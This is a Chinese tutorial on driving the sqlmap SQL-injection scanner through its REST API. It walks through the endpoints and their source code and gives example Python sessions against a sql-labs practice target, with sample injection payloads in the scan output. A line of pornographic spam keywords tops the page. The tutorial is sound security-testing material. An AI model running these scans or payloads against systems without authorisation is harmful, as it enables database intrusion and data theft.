日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 运维知识 > 数据库 >内容正文

数据库

java web sqlmapapi,深入了解SQLMAP API

發(fā)布時(shí)間:2024/1/23 数据库 46 豆豆
生活随笔 收集整理的這篇文章主要介紹了 java web sqlmapapi,深入了解SQLMAP API 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

前言

以前覺(jué)得sqlmap自己玩得挺溜了,結(jié)果最近有一個(gè)任務(wù),需要調(diào)用sqlmap api接口來(lái)驗(yàn)證存在sql注入漏洞的站點(diǎn),一開(kāi)始聽(tīng)到這個(gè)任務(wù)覺(jué)得完了,可能完成不了了。后來(lái)我去網(wǎng)上搜了搜相關(guān)的資料,發(fā)現(xiàn)關(guān)于這方面的資料確實(shí)挺少的,于是參觀了一下sqlmap的源碼,大致摸清楚了如何調(diào)用api接口。因此,筆者打算寫(xiě)一篇完整些的文章,才有了本文。筆者技術(shù)有限,有錯(cuò)誤或者寫(xiě)的不好的地方敬請(qǐng)諒解!

為什么要使用SQLMAP API?

由于SQLMAP每檢測(cè)一個(gè)站點(diǎn)都需要開(kāi)啟一個(gè)新的命令行窗口或者結(jié)束掉上一個(gè)檢測(cè)任務(wù)。雖然 -m 參數(shù)可以批量掃描URL,但是模式也是一個(gè)結(jié)束掃描后才開(kāi)始另一個(gè)掃描任務(wù)。通過(guò)api接口,下發(fā)掃描任務(wù)就簡(jiǎn)單了,無(wú)需開(kāi)啟一個(gè)新的命令行窗口。

下載與安裝

如果您需要使用 sqlmap api接口或者沒(méi)安裝 sqlmap 工具的,您需要下載安裝sqlmap程序。而sqlmap是基于Python 2.7.x 開(kāi)發(fā)的,因此您需要下載Python 2.7.x。

sqlmap的目錄結(jié)構(gòu)圖如下:

sqlmap安裝完成后,輸入以下命令,返回內(nèi)容如下圖一樣,意味著安裝成功:python sqlmap.py -h

sqlmap api

說(shuō)了那么多,到底api如何使用呢?在下載安裝SQLMAP后,你會(huì)在sqlmap安裝目錄中找到一個(gè) sqlmapapi.py 的文件,這個(gè) sqlmapapi.py 文件就是sqlmmap api。sqlmap api分為服務(wù)端和客戶端,sqlmap api有兩種模式,一種是基于HTTP協(xié)議的接口模式,一種是基于命令行的接口模式。

sqlmapapi.py的使用幫助

通過(guò)以下命令獲取sqlmapapi.py的使用幫助:python sqlmapapi.py -h

返回的信息:Usage: sqlmapapi.py [options]

Options:

-h, --help 顯示幫助信息并退出

-s, --server 做為api服務(wù)端運(yùn)行

-c, --client 做為api客戶端運(yùn)行

-H HOST, --host=HOST 指定服務(wù)端IP地址 (默認(rèn)IP是 "127.0.0.1")

-p PORT, --port=PORT 指定服務(wù)端端口 (默認(rèn)端口8775)

--adapter=ADAPTER 服務(wù)端標(biāo)準(zhǔn)接口 (默認(rèn)是 "wsgiref")

--username=USERNAME 可空,設(shè)置用戶名

--password=PASSWORD 可空,設(shè)置密碼

開(kāi)啟api服務(wù)端

無(wú)論是基于HTTP協(xié)議的接口模式還是基于命令行的接口模式,首先都是需要開(kāi)啟api服務(wù)端的。通過(guò)輸入以下命令即可開(kāi)啟api服務(wù)端:python sqlmapapi.py -s

命令成功后,在命令行中會(huì)返回一些信息。以下命令大概的意思是api服務(wù)端在本地8775端口上運(yùn)行,admin token為1acac56427f272e316fceabe5ddff5a5,IPC數(shù)據(jù)庫(kù)的位置在/tmp/sqlmapipc-zOIGm_,api服務(wù)端已經(jīng)和IPC數(shù)據(jù)庫(kù)連接上了,正在使用bottle 框架wsgiref標(biāo)準(zhǔn)接口。[19:53:57] [INFO] Running REST-JSON API server at '127.0.0.1:8775'..

[19:53:57] [INFO] Admin (secret) token: 1acac56427f272e316fceabe5ddff5a5

[19:53:57] [DEBUG] IPC database: '/tmp/sqlmapipc-zOIGm_'

[19:53:57] [DEBUG] REST-JSON API server connected to IPC database

[19:53:57] [DEBUG] Using adapter 'wsgiref' to run bottle

但是通過(guò)上面的這種方式開(kāi)啟api服務(wù)端有一個(gè)缺點(diǎn),當(dāng)服務(wù)端和客戶端不是一臺(tái)主機(jī)會(huì)連接不上,因此如果要解決這個(gè)問(wèn)題,可以通過(guò)輸入以下命令來(lái)開(kāi)啟api服務(wù)端:python sqlmapapi.py -s -H "0.0.0.0" -p 8775

命令成功后,遠(yuǎn)程客戶端就可以通過(guò)指定遠(yuǎn)程主機(jī)IP和端口來(lái)連接到API服務(wù)端。

固定admin token

如果您有特殊的需求需要固定admin token的話,可以修改文件api.py,該文件在sqlmap目錄下的/lib/utils/中,修改該文件的第661行代碼,以下是源代碼:DataStore.admin_token = hexencode(os.urandom(16))

sqlmap api的兩種模式

命令行接口模式

輸入以下命令,可連接api服務(wù)端,進(jìn)行后期的指令發(fā)送操作:python sqlmapapi.py -c

如果是客戶端和服務(wù)端不是同一臺(tái)計(jì)算機(jī)的話,輸入以下命令:python sqlmapapi.py -c -H "192.168.1.101" -p 8775

輸入以上命令后,會(huì)進(jìn)入交互模式,如下圖所示:

命令行接口模式的相關(guān)命令

通過(guò)在交互模式下輸入help命令,獲取所有命令,以下是該接口模式的所有命令:api> help

help 顯示幫助信息

new ARGS 開(kāi)啟一個(gè)新的掃描任務(wù)

use TASKID 切換taskid

data 獲取當(dāng)前任務(wù)返回的數(shù)據(jù)

log 獲取當(dāng)前任務(wù)的掃描日志

status 獲取當(dāng)前任務(wù)的掃描狀態(tài)

option OPTION 獲取當(dāng)前任務(wù)的選項(xiàng)

options 獲取當(dāng)前任務(wù)的所有配置信息

stop 停止當(dāng)前任務(wù)

kill 殺死當(dāng)前任務(wù)

list 顯示所有任務(wù)列表

flush 清空所有任務(wù)

exit 退出客戶端 t

既然了解了命令行接口模式中所有命令,那么下面就通過(guò)一個(gè)sql注入來(lái)演示該模式接口下檢測(cè)sql注入的流程。

檢測(cè)GET型注入

通過(guò)輸入以下命令可以檢測(cè)GET注入new -u "url"

雖然我們僅僅只指定了-u參數(shù),但是從返回的信息中可以看出,輸入new命令后,首先先請(qǐng)求了/task/new,來(lái)創(chuàng)建一個(gè)新的taskid,后又發(fā)起了一個(gè)請(qǐng)求去開(kāi)始任務(wù),因此可以發(fā)現(xiàn)該模式實(shí)質(zhì)也是基于HTTP協(xié)議的。

通過(guò)輸入 status 命令,來(lái)獲取該任務(wù)的掃描狀態(tài),若返回內(nèi)容中的status字段為terminated,說(shuō)明掃描完成,若返回內(nèi)容中的status字段為run,說(shuō)明掃描還在進(jìn)行中。下圖是掃描完成的截圖:

通過(guò)輸入 data 命令,來(lái)獲取掃描完成后注入出來(lái)的信息,若返回的內(nèi)容中data字段不為空就說(shuō)明存在注入。下圖是存在SQL注入返回的內(nèi)容,可以看到返回的內(nèi)容有數(shù)據(jù)庫(kù)類型、payload、注入的參數(shù)等等。

下圖是不存在注入返回的內(nèi)容,data字段為空:

檢測(cè)POST型、cookie、UA等注入

通過(guò)輸入以下命令,在data.txt中加入星號(hào),指定注入的位置,來(lái)達(dá)到檢測(cè)POST、cookie、UA等注入的目的:new -r data.txt

總結(jié)

基于命令行的接口模式用起來(lái)還是比較方便的,我們只需要通過(guò) new 命令就可以自動(dòng)創(chuàng)建taskid并開(kāi)始該任務(wù),但是如果寫(xiě)程序調(diào)用的話可能就不是那么友善了,因此筆者會(huì)重點(diǎn)介紹下面的一種接口模式,基于HTTP協(xié)議的接口模式。

基于HTTP協(xié)議的接口模式

下列都是基于HTTP協(xié)議API交互的所有方法:提示:“@get”就說(shuō)明需要通過(guò)GET請(qǐng)求的,“@post”就說(shuō)明需要通過(guò)POST請(qǐng)求的;POST請(qǐng)求需要修改HTTP頭中的Content-Type字段為application/json。#輔助

@get('/error/401')

@get("/task/new")

@get("/task//delete")

#Admin 命令

@get("/admin/list")

@get("/admin//list")

@get("/admin/flush")

@get("/admin//flush")

#sqlmap 核心交互命令

@get("/option//list")

@post("/option//get")

@post("/option//set")

@post("/scan//start")

@get("/scan//stop")

@get("/scan//kill")

@get("/scan//status")

@get("/scan//data")

@get("/scan//log//")

@get("/scan//log")

@get("/download///")

@get('/error/401')

該接口在我的理解表明首先需要登錄(Admin token),不然會(huì)返回狀態(tài)碼401。具體代碼如下:response.status = 401

return response

@get("/task/new")

該接口用于創(chuàng)建一個(gè)新的任務(wù),使用后會(huì)返回一個(gè)隨機(jī)的taskid。具體代碼如下:def task_new():

"""

Create a new task

"""

taskid = hexencode(os.urandom(8))

remote_addr = request.remote_addr

DataStore.tasks[taskid] = Task(taskid, remote_addr)

logger.debug("Created new task: '%s'" % taskid)

return jsonize({"success": True, "taskid": taskid})

下圖是調(diào)用該接口的截圖:

@get("/task//delete")

該接口用于刪除taskid。在調(diào)用時(shí)指定taskid,不指定taskid會(huì)有問(wèn)題。具體代碼如下:def task_delete(taskid):

"""

Delete an existing task

"""

if taskid in DataStore.tasks:

DataStore.tasks.pop(taskid)

logger.debug("(%s) Deleted task" % taskid)

return jsonize({"success": True})

else:

response.status = 404

logger.warning("[%s] Non-existing task ID provided to task_delete()" % taskid)

return jsonize({"success": False, "message": "Non-existing task ID"})

下圖是調(diào)用該接口的截圖:

@get("/admin/list")/@get("/admin//list")

該接口用于返回所有taskid。在調(diào)用時(shí)指定taskid,不指定taskid會(huì)有問(wèn)題。具體代碼如下:def task_list(token=None):

"""

Pull task list

"""

tasks = {}

for key in DataStore.tasks:

if is_admin(token) or DataStore.tasks[key].remote_addr == request.remote_addr:

tasks[key] = dejsonize(scan_status(key))["status"]

logger.debug("(%s) Listed task pool (%s)" % (token, "admin" if is_admin(token) else request.remote_addr))

return jsonize({"success": True, "tasks": tasks, "tasks_num": len(tasks)})

下圖是調(diào)用該接口的截圖:

@get("/admin/flush")/@get("/admin//flush")

該接口用于刪除所有任務(wù)。在調(diào)用時(shí)指定admin token,不指定admin token可能會(huì)有問(wèn)題。具體代碼如下:def task_flush(token=None):

"""

Flush task spool (delete all tasks)

"""

for key in list(DataStore.tasks):

if is_admin(token) or DataStore.tasks[key].remote_addr == request.remote_addr:

DataStore.tasks[key].engine_kill()

del DataStore.tasks[key]

logger.debug("(%s) Flushed task pool (%s)" % (token, "admin" if is_admin(token) else request.remote_addr))

return jsonize({"success": True})

下圖是調(diào)用該接口的截圖:

@get("/option//list")

該接口可獲取特定任務(wù)ID的列表選項(xiàng),調(diào)用時(shí)請(qǐng)指定taskid,不然會(huì)出現(xiàn)問(wèn)題。具體代碼如下:def option_list(taskid):

"""

List options for a certain task ID

"""

if taskid not in DataStore.tasks:

logger.warning("[%s] Invalid task ID provided to option_list()" % taskid)

return jsonize({"success": False, "message": "Invalid task ID"})

logger.debug("(%s) Listed task options" % taskid)

return jsonize({"success": True, "options": DataStore.tasks[taskid].get_options()})

下圖是調(diào)用該接口的截圖:

@post("/option//get")

該接口可獲取特定任務(wù)ID的選項(xiàng)值,調(diào)用時(shí)請(qǐng)指定taskid,不然會(huì)出現(xiàn)問(wèn)題。具體代碼如下:def option_get(taskid):

"""

Get value of option(s) for a certain task ID

"""

if taskid not in DataStore.tasks:

logger.warning("[%s] Invalid task ID provided to option_get()" % taskid)

return jsonize({"success": False, "message": "Invalid task ID"})

options = request.json or []

results = {}

for option in options:

if option in DataStore.tasks[taskid].options:

results[option] = DataStore.tasks[taskid].options[option]

else:

logger.debug("(%s) Requested value for unknown option '%s'" % (taskid, option))

return jsonize({"success": False, "message": "Unknown option '%s'" % option})

logger.debug("(%s) Retrieved values for option(s) '%s'" % (taskid, ",".join(options)))

return jsonize({"success": True, "options": results})

下圖是調(diào)用該接口的截圖:

@post("/option//set")

該接口為特定任務(wù)ID設(shè)置選項(xiàng)值,調(diào)用時(shí)請(qǐng)指定taskid,不然會(huì)出現(xiàn)問(wèn)題。具體代碼如下:def option_set(taskid):

"""

Set value of option(s) for a certain task ID

"""

if taskid not in DataStore.tasks:

logger.warning("[%s] Invalid task ID provided to option_set()" % taskid)

return jsonize({"success": False, "message": "Invalid task ID"})

if request.json is None:

logger.warning("[%s] Invalid JSON options provided to option_set()" % taskid)

return jsonize({"success": False, "message": "Invalid JSON options"})

for option, value in request.json.items():

DataStore.tasks[taskid].set_option(option, value)

logger.debug("(%s) Requested to set options" % taskid)

return jsonize({"success": True})

下圖是調(diào)用該接口的截圖:

@post("/scan//start")

該接口定義開(kāi)始掃描特定任務(wù),調(diào)用時(shí)請(qǐng)指定taskid,不然會(huì)出現(xiàn)問(wèn)題。具體代碼如下:def scan_start(taskid):

"""

Launch a scan

"""

if taskid not in DataStore.tasks:

logger.warning("[%s] Invalid task ID provided to scan_start()" % taskid)

return jsonize({"success": False, "message": "Invalid task ID"})

if request.json is None:

logger.warning("[%s] Invalid JSON options provided to scan_start()" % taskid)

return jsonize({"success": False, "message": "Invalid JSON options"})

# Initialize sqlmap engine's options with user's provided options, if any

for option, value in request.json.items():

DataStore.tasks[taskid].set_option(option, value)

# Launch sqlmap engine in a separate process

DataStore.tasks[taskid].engine_start()

logger.debug("(%s) Started scan" % taskid)

return jsonize({"success": True, "engineid": DataStore.tasks[taskid].engine_get_id()})

下圖是調(diào)用該接口的截圖:

@get("/scan//stop")

該接口定義停止掃描特定任務(wù),調(diào)用時(shí)請(qǐng)指定taskid,不然會(huì)出現(xiàn)問(wèn)題。具體代碼如下:def scan_stop(taskid):

"""

Stop a scan

"""

if (taskid not in DataStore.tasks or DataStore.tasks[taskid].engine_process() is None or DataStore.tasks[taskid].engine_has_terminated()):

logger.warning("[%s] Invalid task ID provided to scan_stop()" % taskid)

return jsonize({"success": False, "message": "Invalid task ID"})

DataStore.tasks[taskid].engine_stop()

logger.debug("(%s) Stopped scan" % taskid)

return jsonize({"success": True})

下圖是調(diào)用該接口的截圖:

@get("/scan//kill")

該接口可殺死特定任務(wù),需要指定taskid,不然會(huì)出現(xiàn)問(wèn)題。具體代碼如下:def scan_kill(taskid):

"""

Kill a scan

"""

if (taskid not in DataStore.tasks or DataStore.tasks[taskid].engine_process() is None or DataStore.tasks[taskid].engine_has_terminated()):

logger.warning("[%s] Invalid task ID provided to scan_kill()" % taskid)

return jsonize({"success": False, "message": "Invalid task ID"})

DataStore.tasks[taskid].engine_kill()

logger.debug("(%s) Killed scan" % taskid)

return jsonize({"success": True})

@get("/scan//status")

該接口可查詢掃描狀態(tài),調(diào)用時(shí)請(qǐng)指定taskid,不然會(huì)出現(xiàn)問(wèn)題。具體代碼如下:def scan_status(taskid):

"""

Returns status of a scan

"""

if taskid not in DataStore.tasks:

logger.warning("[%s] Invalid task ID provided to scan_status()" % taskid)

return jsonize({"success": False, "message": "Invalid task ID"})

if DataStore.tasks[taskid].engine_process() is None:

status = "not running"

else:

status = "terminated" if DataStore.tasks[taskid].engine_has_terminated() is True else "running"

logger.debug("(%s) Retrieved scan status" % taskid)

return jsonize({

"success": True,

"status": status,

"returncode": DataStore.tasks[taskid].engine_get_returncode()

})

下圖是調(diào)用該接口的截圖:

@get("/scan//data")

該接口可獲得到掃描結(jié)果,調(diào)用時(shí)請(qǐng)指定taskid,不然會(huì)出現(xiàn)問(wèn)題。具體代碼如下:def scan_data(taskid):

"""

Retrieve the data of a scan

"""

json_data_message = list()

json_errors_message = list()

if taskid not in DataStore.tasks:

logger.warning("[%s] Invalid task ID provided to scan_data()" % taskid)

return jsonize({"success": False, "message": "Invalid task ID"})

# Read all data from the IPC database for the taskid

for status, content_type, value in DataStore.current_db.execute("SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC", (taskid,)):

json_data_message.append({"status": status, "type": content_type, "value": dejsonize(value)})

# Read all error messages from the IPC database

for error in DataStore.current_db.execute("SELECT error FROM errors WHERE taskid = ? ORDER BY id ASC", (taskid,)):

json_errors_message.append(error)

logger.debug("(%s) Retrieved scan data and error messages" % taskid)

return jsonize({"success": True, "data": json_data_message, "error": json_errors_message})

下圖是調(diào)用該接口的截圖:存在SQL注入的返回結(jié)果,返回的內(nèi)容包括payload、數(shù)據(jù)庫(kù)類型等等。

@get("/scan//log") /@get("/scan//log//")

該接口可查詢特定任務(wù)的掃描的日志,調(diào)用時(shí)請(qǐng)指定taskid,不然會(huì)出現(xiàn)問(wèn)題。具體代碼如下:def scan_log(taskid):

"""

Retrieve the log messages

"""

json_log_messages = list()

if taskid not in DataStore.tasks:

logger.warning("[%s] Invalid task ID provided to scan_log()" % taskid)

return jsonize({"success": False, "message": "Invalid task ID"})

# Read all log messages from the IPC database

for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)):

json_log_messages.append({"time": time_, "level": level, "message": message})

logger.debug("(%s) Retrieved scan log messages" % taskid)

return jsonize({"success": True, "log": json_log_messages})

def scan_log_limited(taskid, start, end):

"""

Retrieve a subset of log messages

"""

json_log_messages = list()

if taskid not in DataStore.tasks:

logger.warning("[%s] Invalid task ID provided to scan_log_limited()" % taskid)

return jsonize({"success": False, "message": "Invalid task ID"})

if not start.isdigit() or not end.isdigit() or end < start:

logger.warning("[%s] Invalid start or end value provided to scan_log_limited()" % taskid)

return jsonize({"success": False, "message": "Invalid start or end value, must be digits"})

start = max(1, int(start))

end = max(1, int(end))

# Read a subset of log messages from the IPC database

for time_, level, message in DataStore.current_db.execute("SELECT time, level, message FROM logs WHERE taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC", (taskid, start, end)):

json_log_messages.append({"time": time_, "level": level, "message": message})

logger.debug("(%s) Retrieved scan log messages subset" % taskid)

return jsonize({"success": True, "log": json_log_messages})

下圖是調(diào)用該接口的截圖:

@get("/download///")

下載服務(wù)端指定任務(wù)的文件。具體代碼如下:def download(taskid, target, filename):

"""

Download a certain file from the file system

"""

if taskid not in DataStore.tasks:

logger.warning("[%s] Invalid task ID provided to download()" % taskid)

return jsonize({"success": False, "message": "Invalid task ID"})

path = os.path.abspath(os.path.join(paths.SQLMAP_OUTPUT_PATH, target, filename))

# Prevent file path traversal

if not path.startswith(paths.SQLMAP_OUTPUT_PATH):

logger.warning("[%s] Forbidden path (%s)" % (taskid, target))

return jsonize({"success": False, "message": "Forbidden path"})

if os.path.isfile(path):

logger.debug("(%s) Retrieved content of file %s" % (taskid, target))

with open(path, 'rb') as inf:

file_content = inf.read()

return jsonize({"success": True, "file": base64encode(file_content)})

else:

logger.warning("[%s] File does not exist %s" % (taskid, target))

return jsonize({"success": False, "message": "File does not exist"})

看完了以上的接口代碼,我相信您一定會(huì)使用了吧,那么下面就通過(guò)一個(gè)sql注入來(lái)演示該模式接口下檢測(cè)sql注入的流程。

準(zhǔn)備

使用該模式接口需要用到python的兩個(gè)庫(kù)文件,一個(gè)是requests庫(kù),一個(gè)是json庫(kù)。下圖是導(dǎo)入庫(kù)的操作:

檢測(cè)GET型注入

下面是完整的一次API接口訪問(wèn),"從創(chuàng)建任務(wù)ID,到發(fā)送掃描指令,再到查詢掃描狀態(tài),最后查詢結(jié)果”的過(guò)程。

具體輸入輸出代碼如下:>>> r = requests.get("http://127.0.0.1:8775/task/new") 創(chuàng)建一個(gè)新的掃描任務(wù)

>>> r.json()

{'taskid': 'c87dbb00644ed7b7', 'success': True} 獲取響應(yīng)的返回內(nèi)容

>>> r = requests.post('http://127.0.0.1:8775/scan/c87dbb00644ed7b7/start', data=json.dumps({'url':'http://192.168.1.104/sql-labs/Less-2/?id=1'}), headers={'Content-Type':'application/json'}) 開(kāi)啟一個(gè)掃描任務(wù)

>>> r = requests.get("http://127.0.0.1:8775/scan/c87dbb00644ed7b7/status") 查詢?nèi)蝿?wù)的掃描狀態(tài)

>>> r.json()

{'status': 'terminated', 'returncode': 0, 'success': True}

>>> r = requests.get("http://127.0.0.1:8775/scan/c87dbb00644ed7b7/data")

獲取掃描的結(jié)果

>>> r.json()

{'data': [{'status': 1, 'type': 0, 'value': {'url': 'http://192.168.1.104:80/sql-labs/Less-2/', 'query': 'id=1', 'data': None}}, {'status': 1, 'type': 1, 'value': [{'dbms': 'MySQL', 'suffix': '', 'clause': [1, 8, 9], 'notes': [], 'ptype': 1, 'dbms_version': ['>= 5.0'], 'prefix': '', 'place': 'GET', 'data': {'1': {'comment': '', 'matchRatio': 0.957, 'title': 'AND boolean-based blind - WHERE or HAVING clause', 'trueCode': 200, 'templatePayload': None, 'vector': 'AND [INFERENCE]', 'falseCode': 200, 'where': 1, 'payload': 'id=1 AND 8693=8693'}..., 'success': True, 'error': []}

可能您會(huì)被最后返回的結(jié)果好奇,ptype、suffix、clause等等都是什么意思呢?下面我給出部分字段的含義:| 字段 | 含義 | 值 | |:----:|:----:|:----:|| dbms | 數(shù)據(jù)庫(kù)類型 | Microsoft AccessIBM DB2FirebirdSAP MaxDBMicrosoft SQL ServerMySQLOraclePostgreSQLSQLiteSybaseHSQLDBH2Informix | | suffix | 在有些時(shí)候,需要在注入的payload的后面加一些字符,來(lái)保證payload的正常執(zhí)行。 | [GENERIC_SQL_COMMENT] AND ([RANDNUM]=[RANDNUM] AND (([RANDNUM]=[RANDNUM] AND ((([RANDNUM]=...太多了,具體可查看xml/boundaries.xml文件。 | | prefix | 在有些時(shí)候,需要在注入的payload的前面加一些字符,來(lái)保證payload的正常執(zhí)行。 | )')'"...太多了,具體可查看xml/boundaries.xml文件。 | | clause | payload在哪個(gè)語(yǔ)句里生效 | 0: "Always",1: "WHERE",2: "GROUP BY",3: "ORDER BY",4: "LIMIT",5: "OFFSET",6: "TOP",7: "Table name",8: "Column name",9: "Pre-WHERE (non-query)" | | where | 以什么樣的方式將我們的payload添加進(jìn)去 | ORIGINAL = 1NEGATIVE = 2REPLACE = 3 | | ptype | parameter type;注入點(diǎn)的類型 | 1: "Unescaped numeric",2: "Single quoted string",3: "LIKE single quoted string",4: "Double quoted string",5: "LIKE double quoted string", 6: "Identifier (e.g. column name)", | | dbms_version | 數(shù)據(jù)庫(kù)的粗略版本 | >= 5.5>= 5.0.12... | | place | 請(qǐng)求方式 | GETPOST(custom) HEADER | | title | 當(dāng)前測(cè)試Payload的標(biāo)題,通過(guò)標(biāo)題就可以了解當(dāng)前的注入手法與測(cè)試的數(shù)據(jù)庫(kù)類型。 | AND boolean-based blind - WHERE or HAVING clause... | | vector | payload向量 | AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])... | | payload | 有效負(fù)荷,進(jìn)行測(cè)試的SQL語(yǔ)句 | 1、news_id=1 AND 6788=67882、login_user=1&login_password=-3814' OR 7117=7117#&mysubmit=Login | | parameter | 哪個(gè)參數(shù)可以注入 | usernamenews_id.... |

檢測(cè)POST注入、COOKIE、UA等注入

檢測(cè)POST注入和檢測(cè)GET注入類似,但是還是有一定區(qū)別的,與GET注入檢測(cè)區(qū)別如下,流程上是一樣的,不同的是開(kāi)啟掃描任務(wù)的時(shí)候,多提交一個(gè)data字段。requests.post('http://127.0.0.1:8775/scan/cb9c4b4e4f1996b5/start', data=json.dumps({'url':'http://192.168.1.104/sql/sql/post.php','data':'keyword=1'}), headers={'Content-Type':'application/json'})

下面是一次完整的POST注入檢測(cè)過(guò)程

具體輸入輸出代碼如下:>>> r = requests.get("http://127.0.0.1:8775/task/new")

>>> r.json()

{'taskid': 'cb9c4b4e4f1996b5', 'success': True}

>>> r = requests.post('http://127.0.0.1:8775/scan/cb9c4b4e4f1996b5/start', data=json.dumps({'url':'http://192.168.1.104/sql/sql/post.php','data':'keyword=1'}), headers={'Content-Type':'application/json'})

>>> r.json()

{'engineid': 9682, 'success': True}

>>> r = requests.get("http://127.0.0.1:8775/scan/cb9c4b4e4f1996b5/status")

>>> r.json()

{'status': 'terminated', 'returncode': 0, 'success': True}

>>> r = requests.get("http://127.0.0.1:8775/scan/cb9c4b4e4f1996b5/data")

>>> r.json()

{'data': [{'status': 1, 'type': 0, 'value': {'url': 'http://192.168.1.104:80/sql/sql/post.php', 'query': None, 'data': 'keyword=1'}}, {'status': 1, 'type': 1, 'value': [{'dbms': 'MySQL', 'suffix': '', 'clause': [1, 8, 9], 'notes': [], 'ptype': 1, 'dbms_version': ['>= 5.0.12'], 'prefix': '', 'place': 'POST', 'os': None, 'conf': {'code': None, 'string': 'Title=FiveAourThe??', 'notString': None, 'titles': None, 'regexp': None, 'textOnly': None, 'optimize': None}, 'parameter': 'keyword', 'data': {'1': {'comment': '', 'matchRatio': 0.863, 'trueCode': 200, 'title': 'AND boolean-based blind - WHERE or HAVING clause', 'templatePayload': None, 'vector': 'AND [INFERENCE]', 'falseCode': 200, 'where': 1, 'payload': 'keyword=1 AND 3424=3424'}...], 'success': True, 'error': []}

那么如何檢測(cè)COOKIE注入、UA注入這些呢?下面筆者將列出api接口可接收的所有字段,若要檢測(cè)COOKIE注入的話,我們只要在@post("/scan//start")接口中,傳入cookie字段;若要檢測(cè)referer注入的話,我們只要在@post("/scan//start")接口中,傳入referer字段。若要從注入點(diǎn)中獲取數(shù)據(jù)庫(kù)的版本、數(shù)據(jù)庫(kù)的用戶名這些,只要在@post("/scan//start")接口中,傳入getBanner字段,并設(shè)置為True,傳入getUsers字段,并設(shè)置為True。crawlDepth: None

osShell: False

getUsers: False

getPasswordHashes: False

excludeSysDbs: True

ignoreTimeouts: False

regData: None

fileDest: None

prefix: None

code: None

googlePage: 1

skip: None

query: None

randomAgent: False

osPwn: False

authType: None

safeUrl: None

requestFile: None

predictOutput: False

wizard: False

stopFail: False

forms: False

uChar: None

secondReq: None

taskid: 630f50607ebf91dc

pivotColumn: None

preprocess: None

dropSetCookie: False

smart: False

paramExclude: None

risk: 1

sqlFile: None

rParam: None

getCurrentUser: False

notString: None

getRoles: False

getPrivileges: False

testParameter: None

tbl: None

charset: None

trafficFile: None

osSmb: False

level: 1

dnsDomain: None

outputDir: None

skipWaf: False

timeout: 30

firstChar: None

torPort: None

getComments: False

binaryFields: None

checkTor: False

commonTables: False

direct: None

tmpPath: None

titles: False

getSchema: False

identifyWaf: False

paramDel: None

safeReqFile: None

regKey: None

murphyRate: None

limitStart: None

crawlExclude: None

flushSession: False

loadCookies: None

csvDel: ,

offline: False

method: None

tmpDir: None

fileWrite: None

disablePrecon: False

osBof: False

testSkip: None

invalidLogical: False

getCurrentDb: False

hexConvert: False

proxyFile: None

answers: None

host: None

dependencies: False

cookie: None

proxy: None

updateAll: False

regType: None

repair: False

optimize: False

limitStop: None

search: False

shLib: None

uFrom: None

noCast: False

testFilter: None

ignoreCode: None

eta: False

csrfToken: None

threads: 1

logFile: None

os: None

col: None

skipStatic: False

proxyCred: None

verbose: 1

isDba: False

encoding: None

privEsc: False

forceDns: False

getAll: False

api: True

url: http://10.20.40.95/sql-labs/Less-4/?id=1

invalidBignum: False

regexp: None

getDbs: False

freshQueries: False

uCols: None

smokeTest: False

udfInject: False

invalidString: False

tor: False

forceSSL: False

beep: False

noEscape: False

configFile: None

scope: None

authFile: None

torType: SOCKS5

regVal: None

dummy: False

checkInternet: False

safePost: None

safeFreq: None

skipUrlEncode: False

referer: None

liveTest: False

retries: 3

extensiveFp: False

dumpTable: False

getColumns: False

batch: True

purge: False

headers: None

authCred: None

osCmd: None

suffix: None

dbmsCred: None

regDel: False

chunked: False

sitemapUrl: None

timeSec: 5

msfPath: None

dumpAll: False

fileRead: None

getHostname: False

sessionFile: None

disableColoring: True

getTables: False

listTampers: False

agent: None

webRoot: None

exclude: None

lastChar: None

string: None

dbms: None

dumpWhere: None

tamper: None

ignoreRedirects: False

hpp: False

runCase: None

delay: 0

evalCode: None

cleanup: False

csrfUrl: None

secondUrl: None

getBanner: False

profile: False

regRead: False

bulkFile: None

db: None

dumpFormat: CSV

alert: None

harFile: None

nullConnection: False

user: None

parseErrors: False

getCount: False

data: None

regAdd: False

ignoreProxy: False

database: /tmp/sqlmapipc-lI97N8

mobile: False

googleDork: None

saveConfig: None

sqlShell: False

tech: BEUSTQ

textOnly: False

cookieDel: None

commonColumns: False

keepAlive: False

總結(jié)

基于HTTP的接口模式用起來(lái)可能比較繁瑣,但是對(duì)于程序調(diào)用接口還是很友善的。總之該模式的流程是:1、通過(guò)GET請(qǐng)求 http://ip:port/task/new 這個(gè)地址,創(chuàng)建一個(gè)新的掃描任務(wù);2、通過(guò)POST請(qǐng)求 http://ip:port/scan//start 地址,并通過(guò)json格式提交參數(shù),開(kāi)啟一個(gè)掃描;通過(guò)GET請(qǐng)求 http://ip:port/scan//status 地址,即可獲取指定的taskid的掃描狀態(tài)。這個(gè)返回值分為兩種,一種是run狀態(tài)(掃描未完成),一種是terminated狀態(tài)(掃描完成);3、掃描完成后獲取掃描的結(jié)果。

使用Python3編寫(xiě)sqlmapapi調(diào)用程序

